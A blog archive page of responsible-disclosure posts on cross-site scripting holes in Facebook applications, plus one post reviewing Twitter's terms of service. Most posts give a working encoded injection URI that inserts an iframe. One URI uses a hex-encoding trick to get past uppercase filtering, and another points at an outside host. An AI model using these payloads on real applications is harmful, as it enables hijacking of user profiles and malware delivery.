FAXX Hack: (Lil) Green Patch

Facebook Verified Application

Current Monthly Active Users: 2,400,608

Current Rank on Application Leaderboard: 64

Application Developer: Green Patch

Responsiveness: Green Patch did not send any messages, but did patch the hole.

Vulnerability Status: Patched

Capable of Clickjacking Install: Uncertain

Example URI: http://apps.facebook.com/greentrees/house.php?userId=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%2F%22%3E

Notes: This example URI once again does not include a standard double-injection trick. But I was unable to create such an exploit not because of a server whitelist or secure code. In fact, quite the opposite was true – nearly every time I tried to insert FBML or HTML into various pages, I ended up getting SQL errors. It quickly became clear that multiple SQL injection holes existed in this application. In this case, such problems weren’t entirely serious for users, as attacks would be accessing the application database, which does not store any sensitive information. Still, it’s disconcerting to find so many SQL injection holes in a Facebook Verified Application with over 2 million monthly active users.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Bananagrams

Sorry for not posting yesterday – I’ll post another FAXX Hack in a bit to make up for it.

Facebook Verified Application

Current Monthly Active Users: 22,215

Current Rank on Application Leaderboard: 1,165

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/bananagrams/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

A Closer Look at Twitter’s New Terms of Service

On September 10th Twitter released a new Terms of Service (ToS) that you as a user of Twitter should be aware of.  Some of the changes related to privacy and security are noted below with my comments in bold:

  • The Content you submit, post, or display will be able to be viewed by other users of the Services and through third party services and websites. 
    This should be obvious but by using Twitter you should have no expectation of privacy at all (even with a “private” profile).
  • In consideration for Twitter granting you access to and use of the Services, you agree that Twitter and its third party providers and partners may place such advertising on the Services or in connection with the display of Content or information from the Services whether submitted by you or others. 
    Twitter has to make money somehow so don’t be shocked when you see ad’s being generated based on the content of your tweets.

  • You are responsible for safeguarding the password that you use to access the Services and for any activities or actions under your password. We encourage you to use “strong” passwords (passwords that use a combination of upper and lower case letters, numbers and symbols) with your account. Twitter cannot and will not be liable for any loss or damage arising from your failure to comply with the above requirements. 
    This shouldn’t be a surprise either.  If your password gets owned by a hacker, Twitter is not responsible.  However, I still think that Twitter should require stronger passwords on their end.
  • You understand that by using the Services, you may be exposed to Content that might be offensive, harmful, inaccurate or otherwise inappropriate, or in some cases, postings that have been mislabeled or are otherwise deceptive. 
    Disinformation is a popular tactic on Twitter used by spammers as well as people that want to spread incorrect information about news and other topics.  Twitter is not responsible for this type of behavior.  You don’t believe *everything* you read on Twitter right? :-)
  • By submitting, posting or displaying Content on or through the Services, you grant us a worldwide, non-exclusive, royalty-free license (with the right to sublicense) to use, copy, reproduce, process, adapt, modify, publish, transmit, display and distribute such Content in any and all media or distribution methods (now known or later developed).
    Sure, the content you post is yours but whatever you post can be modified, retransmitted, etc by Twitter and third-party apps that interact with Twitter.
  • …you have to use the Twitter API if you want to reproduce, modify, create derivative works, distribute, sell, transfer, publicly display, publicly perform, transmit, or otherwise use the Content or Services. 
    This is the reason that the Twitter API is so open and also the primary reason that spammers and other people with bad intent can take advantage of the service.
  • You may not do any of the following while accessing or using the Services: (i) access, tamper with, or use non-public areas of the Services, Twitter’s computer systems, or the technical delivery systems of Twitter’s providers; (ii) probe, scan, or test the vulnerability of any system or network or breach or circumvent any security or authentication measures…
    This is interesting to me.  So if you are a security researcher you cannot “test” Twitter for vulnerabilities.  That would include fuzzing and/or doing simple tests for XSS.  So if you find a vulnerability on Twitter and disclose it to them can they delete your account, or report you to law enforcement?  Remember kids…don’t test for vulnerabilities without permission first. :-)
  • …or (v) interfere with, or disrupt, (or attempt to do so), the access of any user, host or network, including, without limitation, sending a virus, overloading, flooding, spamming, mail-bombing the Services, or by scripting the creation of Content in such a manner as to interfere with or create an undue burden on the Services.
    The part about flooding and mail-bombing the Services relates to the recent Twitter DD0S I suspect.
  • Twitter will not be responsible or liable for any harm to your computer system, loss of data, or other harm that results from your access to or use of the Services, or any Content. You also agree that Twitter has no responsibility or liability for the deletion of, or the failure to store or to transmit, any Content and other communications maintained by the Services. We make no warranty that the Services will meet your requirements or be available on an uninterrupted, secure, or error-free basis.
    If you use Twitter (or any social network for that matter) don’t assume that it’s “secure”.  They don’t guarantee security an you shouldn’t either.  Also, if you see the Fail Whale…it’s also not guarantee of service availability. :-)

These are the main changes that I picked out related to privacy and security.  However, you should really read the full ToS as it has gotten more detailed then the previous version.  I would suspect more communication from Twitter on future changes to the ToS.

FAXX Hack: Lucky Strike Lanes

Facebook Verified Application

Current Monthly Active Users: 83,243

Current Rank on Application Leaderboard: 539

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/luckystrikelanes/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Bumper Stars

Facebook Verified Application

Current Monthly Active Users: 55,431

Current Rank on Application Leaderboard: 659

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/bumperstars/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E

Notes: You’ll notice the example URI only inserts an iframe, rather than attempting the sort of double-injection of previous examples. Bumper Stars, and two other Large Animal Games applications that will be posted soon, use Facebook’s server whitelist feature for API requests. This means that trying to use injected JavaScript to make API calls will fail, as they originate from the user’s computer and not LAG’s servers. One could still have used the XSS hole to launch a malware attack, but using the whitelist prevents stealing profile information or launching a viral attack via notifications and feed stories.

Bumper Stars was the first application I’ve encountered that made use of the server whitelist feature, and I commend LAG for that step. But while the feature can prevent many of the attacks I’ve outlined, it is not practical for every application. Many other developers make use of the JavaScript API for legitimate calls, and these would fail if the developer enabled a server whitelist.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: kaChing

Facebook Verified Application

Current Monthly Active Users: 28,778

Current Rank on Application Leaderboard: 963

Application Developer: kaChing Group, Inc.

Responsiveness: I received an e-mail from kaChing saying the patch was fixed about six hours after notifying them.

Vulnerability Status: Patched

Capable of Clickjacking Install: Uncertain

Example URI: http://apps.facebook.com/kaching/portfolio/trade?symbol=%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fwww.kaching.com%2F%26%23×66%3B%26%23×62%3B%2F%26%23×70%3B%26%23×6F%3B%26%23×72%3B%26%23×74%3B%26%23×66%3B%26%23×6F%3B%26%23×6C%3B%26%23×69%3B%26%23×6F%3B%2F%26%23×74%3B%26%23×72%3B%26%23×61%3B%26%23×64%3B%26%23×65%3B%3F%26%23×73%3B%26%23×79%3B%26%23×6D%3B%26%23×62%3B%26%23×6F%3B%26%23×6C%3B%3D%253Ciframe%2Bsrc%253D%2522http%253A%252F%252Ffbl.li%252Fr%252F%2522%253E%22%3E

Notes: This hole was very straightforward, but fully exploiting it required one more trick. Since the injected parameter was a stock symbol, the resulting page would automatically capitalize the input when displaying an error message. That meant that the injected URI became uppercase when it needed to be lowercase. To combat that issue, I converted the text parts of the URI to hex encodings, then had to encode those values for a URI. All these steps resulted in the rather lengthy URI above, which did preserve capitalization.

P.S. Those should be lowercase x’s in the example URI.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Birthday Cards

Current Monthly Active Users: 9,067,238

Current Rank on Application Leaderboard: 18

Application Developer: RockYou

Responsiveness: Once again, RockYou never sent a message but did patch the hole.

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/rybirthday/zoo/shop.php?category=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http://fb.rockyou.com/facebook_apps/rybirthdays/zoo/shop.php?category=%2522%252F%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Bumper Sticker

Double hacks tomorrow to make up for Monday’s break.

Facebook Verified Application

Current Monthly Active Users: 5,422,286

Current Rank on Application Leaderboard: 29

Application Developer: LinkedIn

Responsiveness: I sent this hole to Facebook on Sep. 1, then followed up with an e-mail to LinkedIn over the weekend.

Vulnerability Status: Unpatched

Capable of Clickjacking Install: No

Example URI: After further consideration, I’ve changed my mind about the whole 24-hour thing. I’ll post details once the hole is patched.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

1 19 20 21 22 23 35